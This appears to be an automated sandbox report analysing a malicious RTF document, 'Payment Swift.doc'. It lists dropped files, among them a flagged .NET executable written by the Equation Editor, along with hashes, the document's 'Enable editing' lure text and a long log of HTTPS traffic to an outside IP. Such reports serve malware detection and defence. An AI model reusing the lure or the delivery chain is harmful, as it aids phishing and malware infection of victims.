Preview:	L..................F.... ......r......r......u...."...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X....user.8......QK.X.X.....&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.."...X.. .PAYMEN~1.DOC..P.......WC..WC..........................P.a.y.m.e.n.t. .S.w.i.f.t...d.o.c.......{...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Payment Swift.doc.(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .S.w.i.f.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9.W.e8...8.....[D_....3

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.71506101220307
Encrypted:	false
SSDEEP:	3:M1OeLJNYCm42eLJNYCv:MMeNNoeNN1
MD5:	AF72F7B3C76B35416757E998225D56A7
SHA1:	3A7C837E7D7E9E9AAFA64FDD33F32DB5883741D5
SHA-256:	A77B860B3E3355727944E733DC3214EF5977DEC0BC052C7CF93B1EF473B41A07
SHA-512:	0F75C26ADEB0ADDA88E0FDFE5B261D1920B6BCC2ACC9B703125507D0AA4B79681091EFD9CDB23D5CAB2FA5AEC06CBBC88F0C2AD436ACCAD80491A79C6FE6A794
Malicious:	false
Reputation:	low
Preview:	[doc]..Payment Swift.LNK=0..[folders]..Payment Swift.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\microme09255.scr

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	857600
Entropy (8bit):	7.172009190400047
Encrypted:	false
SSDEEP:	12288:yZ9pzkL1KcPt7sOcflZDLpp8jlMVGdAbNASR8OA10aIkiU:yZ9pzUH7ZEdv8JMVGdGAS210aIki
MD5:	75DC78C375DFEE9C0B96FA476BCD5D1C
SHA1:	2F61518B7B14B35B9E4FC53C99455C9D2293F139
SHA-256:	5EA4437DF5DCC07B35C3959A6FC54D07415D77A659F277FD73F34CCCFBBFE1AD
SHA-512:	81673AB01120F7D15675852B4CF3ED020BE1D1BC8494D9DAC213D33324CD22CFE22652FCD85DA06E438C8494FCD19B1E638805651B5412A83AB9912D48015EDB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2................0..............(... ...@....@.. ....................................@.................................X(..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H...........@ ..............p?..........................................0.1.2.3.4.5.6.7.8.9.....WCF.....Kerberos.H.........&.(1.....".......J.~....t....(6...&..{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....".(1.....(.........(7...~....(....o8...o9....#........{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}...."..(=...*..{W...-...}W....

C:\Users\user\Desktop\~$yment Swift.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	3.4938105499758296
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Payment Swift.doc
File size:	139'992 bytes
MD5:	67fea5000046ad95ddf9707506002eaa
SHA1:	b41f04ef65206c9f0305cc0b124dc9a58f1fe0aa
SHA256:	b8fa7245705f07d10b2f028be43ba688ca78ddc224665a2da85d529c124725b1
SHA512:	d829fd14378d1ed8a1a056c2a0d0aaf5989dffad2fc1311874a3ec4b7228ca009945b9e74889761e7e1c35f06dcd335758c7b7456c467a0544f21eb1c1ee1f3f
SSDEEP:	768:owAbZSibMX9gRWjtwAbZSibMX9gRWjtwAbZSibMX9gRWjJeHe6wUm/IqLUV0/s7B:owAlRkwAlRkwAlRIeHON7LUbTtP
TLSH:	82D3AD6DD34B02698F620337AB171E5142BDBA7EF38552B1306C537933EAC39A1252BD
File Content Preview:	{\rtf1..{\*\F8pMt6S60258OYh1lcFW6M57GClhx94TnQGEjAamhe5cWZXtxZngF6FJbYdBAV0eCK3GN1ZCTJDxHvbLfDTg6zHB8XujP1hrm1lqcLPFb90ZRHvIBjpvRfCd}..{\108273978please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial st

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00007528h								no

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 03:05:48.805337906 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:48.805425882 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:48.805496931 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:48.819314957 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:48.819372892 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.099515915 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.099601030 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.105154991 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.105195045 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.105638981 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.105726004 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.175228119 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.216142893 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.676878929 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.676968098 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677009106 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677069902 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677083969 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677139044 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677161932 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677216053 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677300930 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677462101 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677472115 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677526951 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677537918 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677592993 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677608013 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677664995 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677716970 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677776098 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677834988 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.677891016 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.677946091 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.678040981 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.678051949 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.678167105 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.681607962 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.811093092 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811340094 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811486959 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811537981 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.811537981 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.811563015 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811714888 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811774969 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.811786890 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811836004 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.811846972 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811897993 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.811932087 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.811988115 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.812454939 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.812530041 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.812591076 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.812834024 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.812900066 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.812911987 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.812963009 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.813359022 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.813424110 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.813476086 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.813535929 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.813589096 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.813651085 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.813697100 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.813751936 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.813808918 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.813873053 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.814225912 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.814312935 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.814342976 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.814405918 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.814438105 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.814508915 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.957672119 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.957849026 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.957863092 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.957914114 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.957925081 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.957983971 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.957994938 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.958048105 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.958309889 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.958379984 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.958424091 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.958476067 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.958559036 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.958633900 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.958656073 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.958704948 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.958878994 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.958947897 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.958991051 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.959043980 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.960223913 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.960306883 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.960386038 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.960445881 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.960828066 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.960966110 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.961664915 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.961744070 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.961846113 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.961922884 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.962697983 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.962769032 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.962893963 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.962963104 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.963673115 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.963745117 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.964559078 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.964637995 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.964740038 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.964807987 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:49.964819908 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:49.964879990 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.095397949 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.095582962 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.096494913 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.096575975 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.096906900 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.096970081 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.097131014 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.097193956 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.097397089 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.097469091 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.097770929 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.097841024 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.098412037 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.098481894 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.098598003 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.098664045 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.099291086 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.099363089 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.100159883 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.100229979 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.100310087 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.100369930 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.101608992 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.101685047 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.102233887 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.102308989 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.102504015 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.102574110 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.103995085 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.104065895 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.104916096 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.105042934 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.108824968 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.108896017 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.108993053 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.109060049 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.109162092 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.109229088 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.109316111 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.109373093 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.109477043 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.109539986 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.109617949 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.109678984 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.109766006 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.109842062 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.109905958 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.109965086 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.110045910 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.110106945 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.110191107 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.110249996 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.110282898 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.110337973 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.276251078 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.276324987 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.276530027 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.276590109 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.279073954 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.279110909 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.279165030 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.279236078 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.279278040 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.279299021 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.279334068 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.279350996 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.280145884 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.280217886 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.282732010 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.282810926 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.282861948 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.282932043 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.284715891 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.284828901 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.284846067 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.284920931 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.287431955 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.287508011 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.287594080 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.287661076 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.289561987 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.289645910 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.289689064 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.289761066 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.292310953 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.292380095 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.292438984 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.292498112 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.295012951 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.295094013 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.295140982 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.295207024 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.296920061 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.296993017 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.297048092 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.297137022 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.299737930 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.299828053 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.299866915 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.299928904 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.301847935 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.301925898 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.301976919 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.302042961 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.304605961 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.304687023 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.304733992 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.304805040 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.306622982 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.306700945 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.306749105 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.306807041 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.306844950 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.306909084 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.372364998 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.372438908 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.372987032 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.373060942 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.382644892 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.382713079 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.382775068 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.382843018 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.385107040 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.385188103 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.385266066 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.385346889 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.387769938 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.387852907 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.387901068 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.387967110 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.389784098 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.389859915 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.389911890 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.389969110 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.401164055 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.401237011 CEST	49161	443	192.168.2.22	104.21.83.128
Apr 26, 2024 03:05:50.401293039 CEST	443	49161	104.21.83.128	192.168.2.22
Apr 26, 2024 03:05:50.401370049 CEST	49161	443	192.168.2.22	104.21.83.128
